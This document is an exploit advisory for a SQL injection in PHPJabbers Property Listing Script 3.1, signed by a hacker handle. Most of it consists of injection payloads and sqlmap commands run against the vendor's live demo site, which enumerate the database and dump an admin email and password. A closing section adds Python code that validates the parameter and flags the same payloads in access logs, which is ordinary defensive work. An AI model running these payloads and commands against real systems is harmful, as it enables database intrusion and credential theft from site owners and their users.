CraCkEr - The Crack of Eternal Might
From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : phpjabbers.com
Vendor    : PHPJABBERS
Software  : Property Listing Script 3.1
Vuln Type : Remote SQL Injection
Method    : GET
Critical  : High
Impact    : Database Access

Property Listing Script will give you the tools to efficiently manage your own real estate portal.

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k, NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob

(c) CraCkEr 2022

Live Demo Site: https://www.phpjabbers.com/property-listing-script/#sectionDemo

[INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
GET parameter 'min_bedrooms' is vulnerable.
sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:
---
Parameter: min_bedrooms (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861
---

sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5

[INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.6
[01:13:36] [INFO] fetching current database
[01:13:36] [INFO] retrieved: 'pjabbers_demo_pls'
current database: 'pjabbers_demo_pls'

sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent

Database: pjabbers_demo_pls
[66 tables]
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent

fetching columns for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'
Database: pjabbers_demo_pls
Table: pls_30_property_listing_users
[12 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| created    | datetime         |
| email      | varchar(255)     |
| fax        | varchar(255)     |
| id         | int(10) unsigned |
| ip         | varchar(15)      |
| is_active  | enum('T','F')    |
| last_login | datetime         |
| name       | varchar(255)     |
| password   | blob             |
| phone      | varchar(255)     |
| role_id    | int(10) unsigned |
| status     | enum('T','F')    |
+------------+------------------+

sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent

fetching entries of column(s) 'email,password' for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'
Database: pjabbers_demo_pls
Table: pls_30_property_listing_users
[1 entry]
+-----------------+----------+
| email           | password |
+-----------------+----------+
| admin@admin.com | P@S13rd  |
+-----------------+----------+

[-] Done
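The three techniques sqlmap reported above all hinge on one thing: `min_bedrooms` is a count, yet the application lets arbitrary text through to the query. The following is an added example (not the vendor's code and not part of the original advisory) that shows the allow-list check a defender would expect on that parameter, and uses the same markers to flag such requests in Apache access logs; the log lines and client address are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers for the three sqlmap techniques reported in this advisory.
MARKERS = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s*\(?\s*(\d+)\s*=\s*\1\b", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
COUNT_RE = re.compile(r"\d{1,2}")

def validate_min_bedrooms(raw: str) -> int:
    """Allow-list check the application should apply before building SQL:
    a bedroom count is a short run of digits, nothing else is accepted."""
    if not COUNT_RE.fullmatch(raw):
        raise ValueError(f"rejected min_bedrooms value: {raw!r}")
    return int(raw)

def classify_min_bedrooms(value: str) -> list[str]:
    """Name the techniques a rejected min_bedrooms value resembles;
    a value that passes validation yields an empty list."""
    if COUNT_RE.fullmatch(value):
        return []
    return [name for name, pat in MARKERS if pat.search(value)]

def scan_access_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line number, techniques) for every request whose
    min_bedrooms value would fail validate_min_bedrooms()."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in qs.get("min_bedrooms", []):  # parse_qs URL-decodes values
            if not COUNT_RE.fullmatch(value):
                hits.append((lineno, classify_min_bedrooms(value)))
    return hits

# Constructed sample lines (Apache combined format). Lines 2 and 3 carry the
# boolean-based and time-based payloads from the advisory, URL-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jul/2022:01:13:36 +0000] "GET /preview.php?controller=pjListings'
    '&action=pjActionProperties&listing_search=1&min_bedrooms=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Jul/2022:01:13:37 +0000] "GET /preview.php?controller=pjListings'
    '&action=pjActionProperties&listing_search=1&min_bedrooms=1)%20AND%207719=7719'
    '%20AND%20(2759=2759 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Jul/2022:01:13:42 +0000] "GET /preview.php?controller=pjListings'
    '&action=pjActionProperties&listing_search=1&min_bedrooms=1)%20AND%20(SELECT%202245'
    '%20FROM%20(SELECT(SLEEP(5)))iJfC)%20AND%20(1861=1861 HTTP/1.1" 200 5120',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags lines 2 and 3 only; the time-based payload also matches the boolean marker because it ends in `AND (1861=1861`, which is what makes that marker a useful generic catch.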